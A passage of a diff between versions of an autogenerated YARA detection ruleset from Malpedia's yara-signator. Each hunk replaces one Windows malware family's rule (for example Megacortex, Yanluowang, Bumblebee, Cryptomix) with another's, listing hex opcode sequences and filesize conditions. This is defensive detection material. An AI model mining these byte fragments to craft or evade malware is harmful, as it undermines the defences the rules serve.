8d45f0 50 8d45d8 50 } + $sequence_5 = { 58 e8???????? 85c0 75ae 5e 5f c9 } + $sequence_6 = { 85c0 7441 8b5dc8 8b5b28 85db 7427 8b4de4 } + $sequence_7 = { 33f6 56 6810000002 6a03 56 6a01 6800000080 } + $sequence_8 = { 8b583c 03d8 895dc8 8b4334 8945e0 33f6 46 } + $sequence_9 = { 50 ff15???????? 50 ff5508 6a02 } condition: - 7 of them and filesize <70912 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Acridrain_Auto : FILE +rule MALPEDIA_Win_Unidentified_103_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "82271a88-0572-5daa-a06b-4b68b32ae23f" + id = "16a9604f-a791-56b5-96cf-005a08b625a2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acridrain_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_103_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "2ef6b9a2838948e7218bd1e79fe0257da485657bd990a4bc6b62c314342a8e67" + logic_hash = "ea0101ff935636b4e103b28ee875e3c3a8b80a54f2863e597f7dff9a335e50db" score = 75 quality = 75 tags = "FILE" @@ -130119,32 +132821,32 @@ rule MALPEDIA_Win_Acridrain_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb03 8b4dd0 8b45e0 8b55cc 8945cc 8a45f0 8955e0 } - $sequence_1 = { ff76a4 53 e8???????? 83c428 8945dc e9???????? 6a00 } - $sequence_2 = { ffd0 8b75f0 8bc8 83c414 85c9 0f85c5000000 0fce } - $sequence_3 = { eb0c 8b4d9c 83c104 894d9c 8b41fc 8945a0 8bc8 } - $sequence_4 = { eb5d 8b03 8b8890860000 803900 7520 8d442414 6801040000 } - $sequence_5 = { 8b8520ffffff 33ff 8b10 85d2 0f8ea6000000 33c9 898d50ffffff } - $sequence_6 = { f6459c01 0f84ae0b0000 8bc6 83e007 3bf0 0f83d50a0000 e9???????? } - $sequence_7 = { 8b4748 56 ffd0 8b7584 83c410 8bbd78ffffff eb09 } - $sequence_8 = { ffb5d0fdffff e8???????? 83c408 8985d4fdffff 85c0 0f85844b0000 ffb5d0fdffff } - $sequence_9 = { e9???????? 83fe02 750c c7872005000003000000 eb7b c7872005000000000000 83fe03 } + $sequence_0 = { 85db 0f8506030000 8b442470 ffd0 8b542478 81c41c070000 } + $sequence_1 = { 8954240c 8b9424e4000000 89742404 83ea04 89542408 8b8404cc0b0000 8b00 } + $sequence_2 = { 83ec08 85c0 7439 8b8424bc010000 890424 8b44246c ffd0 } + $sequence_3 = { 0fb613 89c3 8d6c11e0 01d1 } + $sequence_4 = { 890424 8b842488000000 ffd0 83ec08 8b842484010000 890424 8b8424a4000000 } + $sequence_5 = { 31db ffd6 c684249803000000 898424bc000000 b878650000 6689842496030000 b865000000 } + $sequence_6 = { c744240804000000 89442404 8b842484010000 890424 8b8424ac000000 ffd0 } + $sequence_7 = { 0f84d3070000 81fd03030000 0f85d5060000 8b842484010000 c744240402000000 89fb be01000000 } + $sequence_8 = { 8bb4244c010000 01ca 880431 0fb68424a5010000 8844290a 0fb68424a6010000 8844290b } + $sequence_9 = { 83ec08 0fb68c2450040000 84c9 741f 31d2 83c201 } condition: - 7 of them and filesize <2244608 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Unidentified_078_Auto : FILE +rule MALPEDIA_Win_Concealment_Troy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "de8cdecb-4380-57eb-b923-e2ba443932e2" + id = "e9475a7d-b707-5e2f-9e3a-86f91b19814e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_078" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_078_auto.yar#L1-L110" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.concealment_troy_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "d08e32bbc4aa8e2920b084e5d720f452f9f589f09a38ee6e42b2e5fd17bef5f8" + logic_hash = "b699251c533e7fec5531f5ef6172ec9300c9329b32d1137bef102f716d43b763" score = 75 quality = 75 tags = "FILE" @@ -130158,32 +132860,32 @@ rule MALPEDIA_Win_Unidentified_078_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7d21 8a440b10 3c5c 7419 } - $sequence_1 = { e8???????? 84c0 7467 f60701 } - $sequence_2 = { e9???????? 80fa5b 7f3c 80fa28 0f8d94010000 } - $sequence_3 = { 80fa0d 0f8421010000 80fa1b 0f8576010000 ba02000000 e8???????? } - $sequence_4 = { 80fa7e 0f8f02010000 e9???????? ba02000000 } - $sequence_5 = { b901010000 ff15???????? 85c0 740e e8???????? } - $sequence_6 = { 0f8cee000000 80fa0d 0f8421010000 80fa1b 0f8576010000 } - $sequence_7 = { 0f8f18010000 80fa23 0f8d82010000 ba02000000 } - $sequence_8 = { 753f a900004011 7521 a900000600 } - $sequence_9 = { 0f8d94010000 80fa26 0f8f18010000 80fa23 0f8d82010000 } + $sequence_0 = { 6a00 6a04 6a00 6aff ff15???????? e8???????? 50 } + $sequence_1 = { 56 57 b900000000 8b7508 0fb68600010000 0fb69e01010000 33d2 } + $sequence_2 = { 894d80 c7458410000000 33c0 88440590 40 3d00010000 } + $sequence_3 = { 50 8d8c2438050000 51 e8???????? 8d942434030000 } + $sequence_4 = { 75f6 80bc242001000022 0f854e040000 6808020000 8d942434090000 } + $sequence_5 = { 51 e8???????? 8bf0 83c408 85f6 7523 } + $sequence_6 = { e8???????? 8d8c243c030000 68???????? 51 e8???????? } + $sequence_7 = { 50 ffd5 bb???????? 8bf8 e8???????? 8b35???????? 50 } + $sequence_8 = { 55 8bec 83e4f8 b834130000 e8???????? a1???????? 33c4 } + $sequence_9 = { 8b1495a0774100 c1e006 8d440224 802080 884dfd 8065fd48 884dff } condition: - 7 of them and filesize <688128 + 7 of them and filesize <229376 } -rule MALPEDIA_Win_Megacortex_Auto : FILE +rule MALPEDIA_Win_Evilpony_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7fddab37-921e-5d3c-ad85-73c5c61f21f7" + id = "e7d929da-c5f9-5c4e-ba1c-7d2c63753499" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.megacortex_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.evilpony_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "c51529de49cb40cceae5744ecd99824ed147bc3c171c405f7c4b90f895a230e9" + logic_hash = "02845c899902aea9d270d9fa0c1670211f713972016e6e56c5e914a4d2e0626d" score = 75 quality = 75 tags = "FILE" @@ -130197,32 +132899,32 @@ rule MALPEDIA_Win_Megacortex_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 8b7d0c 8bf0 83c40c 85f6 0f8517010000 } - $sequence_1 = { 895d84 7202 8b06 6a00 6800000003 6a03 6a00 } - $sequence_2 = { 50 8d85c4fdffff 50 e8???????? 8b95e0fdffff 83c408 c645fc01 } - $sequence_3 = { 8d4101 2bf0 89450c 8975ec ff7508 83fe03 0f823a020000 } - $sequence_4 = { e8???????? 8b4508 8d4d08 83c404 c645f801 8945fc c7450800000000 } - $sequence_5 = { 83f81f 0f87b70e0000 52 51 e8???????? 83c408 33c0 } - $sequence_6 = { f7d8 1bc0 23c1 50 8b45ec 51 8bf4 } - $sequence_7 = { 1bf6 23f1 8bce 2bca 85f6 be01000000 0f44ce } - $sequence_8 = { e8???????? 83c40c 8d8d2cffffff e8???????? 8d8d44ffffff c645fc2e e8???????? } - $sequence_9 = { 6a00 6a00 68000000c0 8d45cc c645fc05 50 8d8d28feffff } + $sequence_0 = { 746e 33c0 6a2d 40 668945f0 58 6a04 } + $sequence_1 = { e8???????? 50 53 e8???????? 83c410 6a23 } + $sequence_2 = { ff15???????? 83f8ff 74d6 8bc7 8b4df8 33cd } + $sequence_3 = { 034df0 03c1 8b4db8 c14da802 8d8401a1ebd96e 8b4dac } + $sequence_4 = { 33f6 ff15???????? 85c0 782c 53 8bc7 e8???????? } + $sequence_5 = { e8???????? c9 c3 55 8bec 83ec18 8b4d08 } + $sequence_6 = { e8???????? 8d855cffffff 50 c7855cffffff94000000 ff15???????? 83bd6cffffff02 7509 } + $sequence_7 = { 56 e8???????? 83c40c 43 5f 5e 8bc3 } + $sequence_8 = { c3 85f6 7436 85ff 7432 53 6a00 } + $sequence_9 = { 39b5f0f7ffff 0f8495000000 39b5e4f7ffff 0f8489000000 6a04 8d9ddcf7ffff c785dcf7ffff1000efbe } condition: - 7 of them and filesize <1556480 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Coinminer_Auto : FILE +rule MALPEDIA_Win_Redpepper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "05a9b3c6-9a1c-50a2-a943-afdee621f718" + id = "6d36eb39-39c8-5443-a77b-2290277533bd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.coinminer_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.redpepper_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "254b4cb9ab983948d36cfb896be0834484f66bd70a718e15bb65a41d1319a142" + logic_hash = "e4e4c0e91e25e59e6fb978e405ca0275203329718b6dc395151e5d470e453248" score = 75 quality = 75 tags = "FILE" @@ -130236,32 +132938,32 @@ rule MALPEDIA_Win_Coinminer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 85d2 750d 8b45f8 8b55fc 5f 5e } - $sequence_1 = { 8d7f04 73ef 83c104 8a10 7410 48 ffc0 } - $sequence_2 = { e9???????? 6a00 ff742414 ffd6 ff742414 8b3d???????? ffd7 } - $sequence_3 = { c3 8bc6 c745f200000000 99 0f57c0 66c745f60000 660fd645ea } - $sequence_4 = { 8bf0 e8???????? 8bf8 8d842450130000 } - $sequence_5 = { 53 56 8b35???????? 8bd9 57 8b3d???????? } - $sequence_6 = { 57 ff15???????? c70300000000 8b4510 5f c70600000000 5e } - $sequence_7 = { 9b 53 83473220 2c6a } - $sequence_8 = { 8d842434010000 50 ff15???????? 56 e8???????? 57 } - $sequence_9 = { 83c408 890d???????? 8bf2 8935???????? 85c9 7504 85f6 } + $sequence_0 = { 57 8bf9 8b870c1e0000 85c0 } + $sequence_1 = { 8b500c 41 83f904 8b12 8a540aff } + $sequence_2 = { 8b4d10 881e 50 8901 e8???????? 59 } + $sequence_3 = { 8b4520 3bc7 7439 68a1000000 68???????? 50 e8???????? } + $sequence_4 = { 53 55 56 33f6 57 8b7c2428 } + $sequence_5 = { 752d 689f000000 68???????? 6a26 } + $sequence_6 = { c3 8b7c2418 85ff 7432 e8???????? } + $sequence_7 = { 8845f3 8845f4 8845f7 8845f8 } + $sequence_8 = { 8b742414 6a0f f7d1 49 56 8be9 e8???????? } + $sequence_9 = { e8???????? 8b44241c 8b6c2428 8b4c2418 } condition: - 7 of them and filesize <1523712 + 7 of them and filesize <2482176 } -rule MALPEDIA_Win_Orcarat_Auto : FILE +rule MALPEDIA_Win_Temp_Stealer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2de223cb-857a-5d4b-8d3a-323fa4ad4ded" + id = "f2cc61b5-19bf-56a2-9eca-3f40739e6ccc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.orcarat_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.temp_stealer_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "12ec16d312c505ceab125190551fe03bd174598263e03e7c0fe4b3239bc4fe94" + logic_hash = "225e1e9fc27831c15c6655569f2cde4ac7e8ac8903eef398ab726a5dfa80c059" score = 75 quality = 75 tags = "FILE" @@ -130275,32 +132977,32 @@ rule MALPEDIA_Win_Orcarat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f2ae 8d84242c110000 f7d1 50 894c2414 51 } - $sequence_1 = { 8d8c2418010000 50 51 8d842430110000 52 50 } - $sequence_2 = { 56 6a00 8d5708 6a10 } - $sequence_3 = { 53 8dbef4020000 51 50 } - $sequence_4 = { 8bf0 85f6 7451 8b442414 85c0 7421 } - $sequence_5 = { f2ae 8d442420 f7d1 50 894c2418 ff15???????? 50 } - $sequence_6 = { 303d???????? 40 00803d400023 d18a0688078a 46 018847018a46 } - $sequence_7 = { 5d 5b 81c418020000 c20400 6a01 8d142e } - $sequence_8 = { ff15???????? 85c0 0f849e010000 8b0f 53 6a01 51 } - $sequence_9 = { 33db 837d0000 762f 8d542410 c744241000000000 52 6800080000 } + $sequence_0 = { 4d8bc7 498bce e8???????? 4885c0 7405 492bc6 eb04 } + $sequence_1 = { 488d4c2430 e8???????? 488b442430 48635004 488d051a730300 4889441430 488b442430 } + $sequence_2 = { 5e 5d c3 4889542410 48894c2408 55 53 } + $sequence_3 = { 488d4dc0 e8???????? 0f10442460 0f1145c0 0f104c2470 0f114dd0 660f6f05???????? } + $sequence_4 = { 418ac7 84c0 0f8408010000 8b4c2448 488d154240fdff 2b4c244c 41b826000000 } + $sequence_5 = { 488d4c2430 e8???????? 488d542430 488d4c2470 e8???????? 90 } + $sequence_6 = { 488d4c2450 e8???????? 660f6f05???????? 488d152a670300 488d4de0 4c896de0 f30f7f45f0 } + $sequence_7 = { 4183f805 0f8582000000 8b470c 458d487a c744243001000000 4c8d05ee7f0100 89442428 } + $sequence_8 = { ff15???????? 4c8be0 488985a0000000 488d15b9a30300 488bcb ff15???????? 4c8bf8 } + $sequence_9 = { 488d4c2458 e8???????? 90 488d8d48010000 e8???????? 488d45a8 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <652288 } -rule MALPEDIA_Win_Rhino_Auto : FILE +rule MALPEDIA_Win_Yanluowang_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "11a60875-723d-53d2-ab23-e9023e9a450c" + id = "f8b88dbc-f363-5fc7-a947-363c58e30984" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rhino_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yanluowang_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "06d154dd08a9cc876dd4f55564b3f05b1da55b4793bd9c16429a3bb1cbe16dda" + logic_hash = "6b0c4fbf1cf464112256b7ec1836b8a801dfd07954f33f682759e2bccef6aa82" score = 75 quality = 75 tags = "FILE" @@ -130314,32 +133016,32 @@ rule MALPEDIA_Win_Rhino_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4160 c3 6a40 58 c3 b8???????? e8???????? } - $sequence_1 = { c745f00f000000 885ddc 53 be04010000 895dfc 56 8d4ddc } - $sequence_2 = { c1c105 8b400c 89442440 8bc5 034c2440 33c3 23c6 } - $sequence_3 = { 2b16 b8ffffff03 c1fa06 2bc2 3bc1 7217 8d040a } - $sequence_4 = { e8???????? 8bf9 897df0 8b7508 8d4f0c c74704???????? 56 } - $sequence_5 = { e8???????? 895d60 897d64 8b06 8d4de0 51 8bce } - $sequence_6 = { 890496 85c9 75e6 42 3b54240c 72ec 33c0 } - $sequence_7 = { 74af 8b4634 8d4d08 51 50 50 894508 } - $sequence_8 = { 5e 64890d00000000 c9 c3 8b514c 395148 57 } - $sequence_9 = { 8b4f14 8b4114 3b410c 7507 8bcf e8???????? 33c0 } + $sequence_0 = { 50 c745c8eca14400 c745cc02000000 e8???????? 8d45f8 50 8d8578ffffff } + $sequence_1 = { 7402 8913 8d510c 33ff 85d2 7402 } + $sequence_2 = { 85c1 750c 3bd1 1bd2 23d0 23542430 } + $sequence_3 = { 85c0 7402 8908 8b55d8 8d4804 33d6 85c9 } + $sequence_4 = { 8b048528c44500 6975d007536554 33048d28c04500 8945c0 8b45f8 8b4dc0 c1e808 } + $sequence_5 = { 8b4508 8bd6 33d7 f7d6 } + $sequence_6 = { 83c438 c645fc14 8d8d78eeffff ffb5e8eeffff ffb5b8eeffff ffb5b4eeffff ffb57ceeffff } + $sequence_7 = { 8b01 85c0 0f84cc2b0200 83f808 7d0f 6bc018 } + $sequence_8 = { 84ff 7557 8b95acf5ffff 8bc2 8b8da8f5ffff 2bc1 } + $sequence_9 = { 337dc8 8b4514 85c0 7402 8938 8d7904 33d2 } condition: - 7 of them and filesize <1288192 + 7 of them and filesize <834560 } -rule MALPEDIA_Win_Upatre_Auto : FILE +rule MALPEDIA_Win_Bumblebee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1628c1f9-1d48-5501-a98b-2c8f976e35eb" + id = "2d631f7c-7434-5c27-9009-44b4e59637b5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.upatre_auto.yar#L1-L164" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bumblebee_auto.yar#L1-L109" license_url = "N/A" - logic_hash = "ec286f640db5a5b7bffd2eededa524e0947ea3452d78b30e2aeb2f315c32ce53" + logic_hash = "5441d9d4140ebd43dfbd5141b1d6fd9472ec1ff4702b3388ec7d6ec403a89c52" score = 75 quality = 75 tags = "FILE" @@ -130353,40 +133055,32 @@ rule MALPEDIA_Win_Upatre_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 66ab 33c0 66ab bbff0f0000 8b75f0 } - $sequence_1 = { 8945fc 8bd8 03c1 8bf8 33c0 } - $sequence_2 = { 894d90 8b4d8c 85c9 7501 c3 57 } - $sequence_3 = { 7414 4e 56 ff75f0 } - $sequence_4 = { 0430 66ab 81c60e010000 ac } - $sequence_5 = { 8945ec 6a00 8d4dc0 51 ff75e0 ff75bc ff75ec } - $sequence_6 = { 895d98 8bfb 03d8 b91c010000 } - $sequence_7 = { b900100000 03c1 8945f0 03c1 } - $sequence_8 = { 83c008 8945bc 8b4dbc 8b5104 52 } - $sequence_9 = { 8b55d4 8b440a1c 8945f4 8b4df0 } - $sequence_10 = { 0f94c0 85c0 7436 8b4dd8 83c102 2b4de8 } - $sequence_11 = { e3c9 1bb6aeaca844 bbcdcc70e8 739c d4ef } - $sequence_12 = { eb2b 8b4df4 8b510c 52 e8???????? 83c404 0fb7c0 } - $sequence_13 = { 8b4508 0345f0 0fbe08 8b5510 0faf55f8 0faf55f0 33ca } - $sequence_14 = { 8945dc 8b4ddc 668b11 668955f0 0fb745f0 } - $sequence_15 = { 894df4 8b55f4 3b550c 7d28 } + $sequence_0 = { 0fb7570e 6623d1 740d 0fbe470d b90d000000 2bc8 } + $sequence_1 = { 0f44c1 833c1800 7475 837c180400 746e 8b1418 488b05???????? } + $sequence_2 = { 0f88cc000000 4863533c 488b05???????? 4803d6 4885c0 0f84b5000000 488d4c2430 } + $sequence_3 = { 0f880c010000 488b7580 4885f6 0f84ff000000 488b05???????? 4885c0 0f84ef000000 } + $sequence_4 = { 0f8895000000 8b7b28 b8c0000000 4803fe ba64860000 66395304 8d4810 } + $sequence_5 = { 0fbec0 8d59e8 8d1c58 ffc2 } + $sequence_6 = { 0f57c0 c744242800000008 4c8d45d0 488975d8 8d4640 488975e0 } + $sequence_7 = { 0f8840010000 488b05???????? 4885c0 0f8430010000 488b542448 488d4c2438 48894c2420 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <4825088 } -rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE +rule MALPEDIA_Win_Cryptomix_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9f025408-c0a3-516e-ac3a-efc2033f9b9b" + id = "9865a2c1-f352-5196-8a74-a585373e6231" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.olympic_destroyer_auto.yar#L1-L222" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cryptomix_auto.yar#L1-L173" license_url = "N/A" - logic_hash = "93564b4c61bfe578140a2ed1dd33860e59e2d49295b03d310dd7eaa077d799f2" + logic_hash = "2b59fc336b11257878a1c3e0c2e35ea57cb53b57126b62f006b040ede13bda6d" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -130398,45 +133092,38 @@ rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 33c0 89542414 57 } - $sequence_1 = { 6690 3939 770a 8bc1 46 } - $sequence_2 = { 8b0c8d60ee5500 80643128fd 5f 5e } - $sequence_3 = { 50 689b000000 e8???????? e9???????? } - $sequence_4 = { ff15???????? 6880ee3600 ff15???????? 6800000500 56 } - $sequence_5 = { 50 68???????? e8???????? 83c408 8907 85c0 0f8480000000 } - $sequence_6 = { a1???????? 85c0 741a 833d????????00 7c0a } - $sequence_7 = { 50 68???????? 8d85e4fcffff 6805010000 } - $sequence_8 = { a1???????? c705????????f3274000 8935???????? a3???????? ff15???????? a3???????? 83f8ff } - $sequence_9 = { 7678 eb06 8b8de8efffff 2b8df0efffff 1b85f4efffff } - $sequence_10 = { 2bfa 8d0450 57 50 } - $sequence_11 = { 750b ff15???????? e9???????? 8b3d???????? 6a02 56 } - $sequence_12 = { 83f8fe 7419 8a4a02 3a4e02 } - $sequence_13 = { 83ffff 743a 8d857cf9ffff 50 57 ff15???????? } - $sequence_14 = { 898588f9ffff 8d85e4fbffff 68???????? 50 ff15???????? 83c40c 8d8594f9ffff } - $sequence_15 = { 8d842494000000 89442424 8d54241c 8b44245c 8d4c2424 6a24 } - $sequence_16 = { 50 68???????? 8bd7 8bcb e8???????? 8bd8 } - $sequence_17 = { 8d8580f7ffff 50 56 56 56 56 } - $sequence_18 = { 89442418 85c0 743a 57 } - $sequence_19 = { 50 68???????? 8d85ecfdffff 6805010000 } - $sequence_20 = { ffd6 50 ff15???????? 8d8594f9ffff } - $sequence_21 = { 50 68???????? e8???????? 83c40c 8903 5f } - $sequence_22 = { 50 68???????? 8901 ff770c e8???????? 83c40c } + $sequence_0 = { c3 68f0767c2a 6a04 e8???????? 59 59 } + $sequence_1 = { 02f8 0fb6cf 8d7601 0fb60439 8846ff 881439 33c9 } + $sequence_2 = { e8???????? 59 eb03 8b5df0 ff75f8 e8???????? } + $sequence_3 = { 7504 6a08 eb35 83f804 } + $sequence_4 = { ff4d08 8b4dfc 8ad8 75cc 5f } + $sequence_5 = { 59 59 ffd0 83f87a 7413 56 57 } + $sequence_6 = { 56 683f000f00 56 56 56 53 57 } + $sequence_7 = { ffd0 c3 686ea4ffa5 6a05 } + $sequence_8 = { ffd6 85c0 0f856a010000 68???????? 8d85c4f9ffff } + $sequence_9 = { 837d0c01 8bbdb8f9ffff a1???????? 68???????? } + $sequence_10 = { 68???????? 57 ffd0 ff75fc e8???????? } + $sequence_11 = { 8bf1 6a01 899584efffff 89b58cefffff 898588efffff ff15???????? 6808020000 } + $sequence_12 = { 8d85c4f9ffff 50 ffd7 85c0 7460 68???????? } + $sequence_13 = { 8b35???????? 68007d0000 6a40 c745f8e8030000 } + $sequence_14 = { 6a00 6a00 ff15???????? 6896000000 ff15???????? 8b9d80efffff 8d8598f9ffff } + $sequence_15 = { 68???????? 56 e8???????? 59 59 85c0 7759 } condition: - 7 of them and filesize <1392640 + 7 of them and filesize <188416 } -rule MALPEDIA_Win_Fudmodule_Auto : FILE +rule MALPEDIA_Win_Avzhan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c661ff1b-7299-5697-883f-829f2d507cdf" + id = "ae24c209-0bbe-565c-a4e8-dc5e113ea302" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fudmodule" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fudmodule_auto.yar#L1-L171" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avzhan_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "18effdd37514264473c04c4c667c18f4f01327ffa64b50ebf53a4b08029b6c60" + logic_hash = "e5753cf0528c1786d65aca4559b3855c06a602b71f8830b1dc3d077867894002" score = 75 quality = 75 tags = "FILE" @@ -130450,38 +133137,32 @@ rule MALPEDIA_Win_Fudmodule_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f99c4 660fc8 f6d4 58 e9???????? e9???????? 660fbae405 } - $sequence_1 = { 66d3d3 f7db f6d3 4883c420 } - $sequence_2 = { e9???????? 0fb78120010000 b9b01d0000 663bc1 76e3 b97d4f0000 } - $sequence_3 = { d3d8 31d2 0c5b 89d0 } - $sequence_4 = { 498b8c24d8090000 e8???????? 498b8c24e0090000 e8???????? 4983bc24d809000000 488bb42480000000 488b5c2478 } - $sequence_5 = { 488d45af 41b908000000 4d8bc5 4889442420 ff96d00d0000 } - $sequence_6 = { 0f855b73ffff 66d3fe 80fbfc 09e6 89f9 6681c69719 } - $sequence_7 = { 41ffc1 453bc8 7e27 b818000000 8bc8 } - $sequence_8 = { 55 57 4154 488dac2400feffff 4881ec00030000 488b05???????? 4833c4 } - $sequence_9 = { 210a dd63c2 58 5f } - $sequence_10 = { 85c0 755f 488b4c2470 e8???????? 448b86b40c0000 } - $sequence_11 = { 0facea1a 56 660fbdf4 0fc1ca 488b5510 d2e5 } - $sequence_12 = { f9 81fd658b2961 83c101 84c0 660fbae005 d2fb } - $sequence_13 = { 66d3f3 0fcf 8b3e 6681feaa7e 00ef 18cb } - $sequence_14 = { 48ff25???????? 4889742410 55 57 4154 488bec 4883ec60 } - $sequence_15 = { ff96d00d0000 4c8b5d97 4d3bdc 75c8 } + $sequence_0 = { f3aa 8b3d???????? 833d????????01 7418 } + $sequence_1 = { 75e8 6a14 ff15???????? 833d????????01 75d2 } + $sequence_2 = { 8bf0 8dbc2404020000 83c9ff 33c0 83c408 f2ae } + $sequence_3 = { 68???????? 51 ff15???????? 8b2d???????? 8b1d???????? b910000000 } + $sequence_4 = { 8d442464 52 50 e8???????? 83c404 50 e8???????? } + $sequence_5 = { 6a00 6a00 6a00 6a00 6a00 8d8c2418020000 6a00 } + $sequence_6 = { 83c408 f2ae f7d1 6a00 51 8d8c2404020000 51 } + $sequence_7 = { 8bc3 83c408 c1e010 668bc3 8b1d???????? c1e902 } + $sequence_8 = { 6a00 51 6a00 ffd5 85c0 } + $sequence_9 = { 51 8d842484010000 52 50 } condition: - 7 of them and filesize <795648 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Longwatch_Auto : FILE +rule MALPEDIA_Win_7Ev3N_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "9cbc3845-247e-5088-802c-974faf2556c3" + id = "cf231267-d18f-5fab-bbdf-ab3bf00ba51c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch" - source_url = 